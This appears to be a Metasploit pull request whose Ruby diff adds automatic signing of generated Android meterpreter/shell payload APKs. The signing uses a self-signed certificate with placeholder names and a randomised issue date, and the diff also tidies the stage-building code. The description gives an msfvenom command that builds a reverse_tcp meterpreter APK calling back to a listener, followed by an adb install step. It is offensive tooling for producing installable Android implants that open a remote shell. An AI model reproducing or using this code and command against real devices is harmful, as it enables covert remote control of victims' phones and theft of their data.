### PR TITLE
Add in-line signing

### DIFF
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -10,10 +10,10 @@ module Msf::Payload::Dalvik
 	def fix_dex_header(dexfile)
 		dexfile = dexfile.unpack('a8LH40a*')
 		dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])
-		dexfile[1] = Zlib::adler32(dexfile[2..-1].pack('H40a*'))
+		dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))
 		dexfile.pack('a8LH40a*')
 	end
-	
+
 	#
 	# We could compile the .class files with dx here
 	#
@@ -26,6 +26,10 @@ module Msf::Payload::Dalvik
 	def generate
 		generate_jar.pack
 	end
-	
+
+	def java_string(str)
+		[str.length].pack("N") + str
+	end
+
 end
 

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -51,7 +51,32 @@ module Metasploit3
 		jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
 		jar.build_manifest
 
-		#jar.sign(@key, @cert, @ca_certs) '~/.android/debug.keystore' -sigalg MD5withRSA -digestalg SHA1?
+		x509_name = OpenSSL::X509::Name.parse(
+			"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+			)
+		key  = OpenSSL::PKey::RSA.new(1024)
+		cert = OpenSSL::X509::Certificate.new
+		cert.version = 2
+		cert.serial = 1
+		cert.subject = x509_name
+		cert.issuer = x509_name
+		cert.public_key = key.public_key
+
+		# Some time within the last 3 years
+		cert.not_before = Time.now - rand(3600*24*365*3)
+
+		# From http://developer.android.com/tools/publishing/app-signing.html
+		# """
+		# A validity period of more than 25 years is recommended.
+		#
+		# If you plan to publish your application(s) on Google Play, note
+		# that a validity period ending after 22 October 2033 is a
+		# requirement. You can not upload an application if it is signed
+		# with a key whose validity expires before that date.
+		# """
+		cert.not_after = cert.not_before + 3600*24*365*30 # 30 years
+
+		jar.sign(key, cert, [cert])
 
 		jar
 	end

--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -44,9 +44,8 @@ module Metasploit3
 		file = File.join(Msf::Config.data_directory, "android", "meterpreter.jar")
 		met = File.open(file, "rb") {|f| f.read(f.stat.size) }
 
-		# All of the dendencies to create a dalvik loader, followed by the length of the classname to load,
-		# followed by the classname, followed by the length of the jar and the jar itself.
-		[clazz.length].pack("N") + clazz + [metstage.length].pack("N") + metstage + [met.length].pack("N") + met
+		# Name of the class to load from the stage, the actual jar to load
+		# it from, and then finally the meterpreter stage
+		java_string(clazz) + java_string(metstage) + java_string(met)
 	end
-
 end

--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@@ -34,16 +34,16 @@ module Metasploit3
 	end
 
 	#
-	# Override the Payload::Dalvik version so we can load a prebuilt jar to be
-	# used as the final stage
+	# Override the {Payload::Dalvik} version so we can load a prebuilt jar
+	# to be used as the final stage
 	#
 	def generate_stage
 		clazz = 'androidpayload.stage.Shell'
 		file = File.join(Msf::Config.data_directory, "android", "shell.jar")
-		met = File.open(file, "rb") {|f| f.read(f.stat.size) }
+		shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
 
-		# All of the dendencies to create a dalvik loader, followed by the length of the classname to load,
-		# followed by the classname, followed by the length of the jar and the jar itself.
-		[clazz.length].pack("N") + clazz + [met.length].pack("N") + met
+		# Name of the class to load from the stage, and then the actual jar
+		# to load it from
+		java_string(clazz) + java_string(shell_jar)
 	end
 end


### PR DESCRIPTION
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk

See #1708 
